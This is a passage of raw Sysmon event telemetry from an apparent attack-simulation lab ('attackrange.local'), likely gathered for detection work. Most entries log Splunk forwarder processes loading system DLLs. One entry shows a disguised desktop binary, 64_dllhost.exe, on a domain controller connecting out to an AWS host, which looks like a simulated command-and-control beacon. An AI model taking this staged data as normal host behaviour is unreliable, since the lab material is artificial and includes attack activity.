Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\combase.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=88632FDECDE467B887C3594BE2EC545C,SHA256=FFED4D80961917C785063411ED15CED1DB6588AD925E76D72E1BF684FFDBF25DtrueMicrosoft WindowsValid 734700x80000000000000001605767Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x80000000000000001605766Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32full.dll10.0.14393.4350 (rs1_release.210407-2154)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F9FE858A976B6D38FD5CEA46019B246A,SHA256=37F7417D0AA2A15121A14CF176F0C4A1B6BB01E290324CCA0DDB001F47E8C458trueMicrosoft WindowsValid 734700x80000000000000001605765Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x80000000000000001605764Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x80000000000000001605763Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x80000000000000001605762Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x80000000000000001605761Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x80000000000000001605760Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x80000000000000001605759Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x80000000000000001605758Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x80000000000000001605757Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x80000000000000001605756Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4350 (rs1_release.210407-2154)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=BC930981DA6E598A6A2E87D8355CB38A,SHA256=34DB9A305C0574B5C1694A499221B520DFB2BFD894D8E95096ABF09F1182D758trueMicrosoft WindowsValid 734700x80000000000000001605755Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x80000000000000001605754Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x80000000000000001605753Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x80000000000000001605752Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x80000000000000001605751Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x80000000000000001605750Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x80000000000000001605749Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x80000000000000001605748Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x80000000000000001605747Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x80000000000000001605746Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\advapi32.dll10.0.14393.2969 (rs1_release.190503-1820)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=F5442C4B9A99C3AED71BED79AC46DAD1,SHA256=05F47403F3BD93FB11F39A5CB4D6E4DD08B35FF4FA3D4969D8E5396D38FB484BtrueMicrosoft WindowsValid 10341000x80000000000000001605745Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-842B-607D-9B00-00000000BB01}31683556C:\Windows\system32\conhost.exe{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001605744Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x80000000000000001605743Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x80000000000000001605742Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ntdll.dll10.0.14393.4350 (rs1_release.210407-2154)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=4C8F6DF16BD8E2739EC0D3439EA7507C,SHA256=79E203951A298D2818A9484A56521FA70DF19B7053F704378375128C7C48E8EEtrueMicrosoft WindowsValid 734700x80000000000000001605741Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241trueSplunk, Inc.Valid 10341000x80000000000000001605740Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-83AC-607D-0500-00000000BB01}412528C:\Windows\system32\csrss.exe{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001605739Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.733{21761711-842A-607D-9700-00000000BB01}37163760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001605738Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.718{21761711-7A4B-6080-BE60-00000000BB01}7588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{21761711-83AD-607D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241{21761711-842A-607D-9700-00000000BB01}3716C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x80000000000000001605737Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:17:31.718{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001605736Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:17:31.718{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001605735Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:17:31.718{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001605734Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:17:31.718{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001605733Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 19:17:31.718{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001605732Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 19:17:31.718{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 11241100x80000000000000001605731Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.433{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001605730Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.433{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8986CB99929EE32BEA3B7E28EC6B1800,SHA256=35F450EFE46D1B8F9A15E6E8140FF1C1BB57CCEBB318455A0BA3DA261018E570falsefalse - insufficient disk space 354300x80000000000000001094916Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:25.520{761B69BB-65B6-6080-265D-00000000BA01}2304C:\Users\Administrator\Desktop\64_dllhost.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-982.attackrange.local1135-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 10341000x80000000000000001094915Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:31.470{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001094914Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:31.470{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001094913Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:17:31.112{761B69BB-8200-607D-A100-00000000BA01}4148NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=E21F5C2105D3482548EE1DCEAA8E3F18,SHA256=A62C5AB5FD16B72845400EE5338C4D5D0AC27884510730AA80A58BEA4A9B021E,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001605729Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.351{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001605728Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.351{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=98E4D629711A9E541EDC5F45BB97E696,SHA256=A71B1C2CAA326D726A704D105ECAC345D2DBBEADDB7AAECA4CDBF7BD3E733A40falsefalse - insufficient disk space 534500x80000000000000001605727Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.170{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe 734700x80000000000000001605726Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.170{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x80000000000000001605725Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.170{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x80000000000000001605724Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.170{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 11241100x80000000000000001605723Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.085{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001605722Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.085{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8745397D826ACF9C3B41BC2A9B5F61C4,SHA256=0E8DB349B5B388244272F9E78FF81ECDC934D724EF6CB8DED9C5CD6DFD8554A5falsefalse - insufficient disk space 734700x80000000000000001605721Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.054{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x80000000000000001605720Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.054{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.2969 (rs1_release.190503-1820)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=B6E99FD898E948657373BB02708C7C00,SHA256=90476029BD7AB0FEC53AAE567AE53BC0B09C7C5C8C7B8F19485BA872B74ED591trueMicrosoft WindowsValid 734700x80000000000000001605719Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:17:31.054{21761711-7A4B-6080-BD60-00000000BB01}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x80000000000000001605718Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 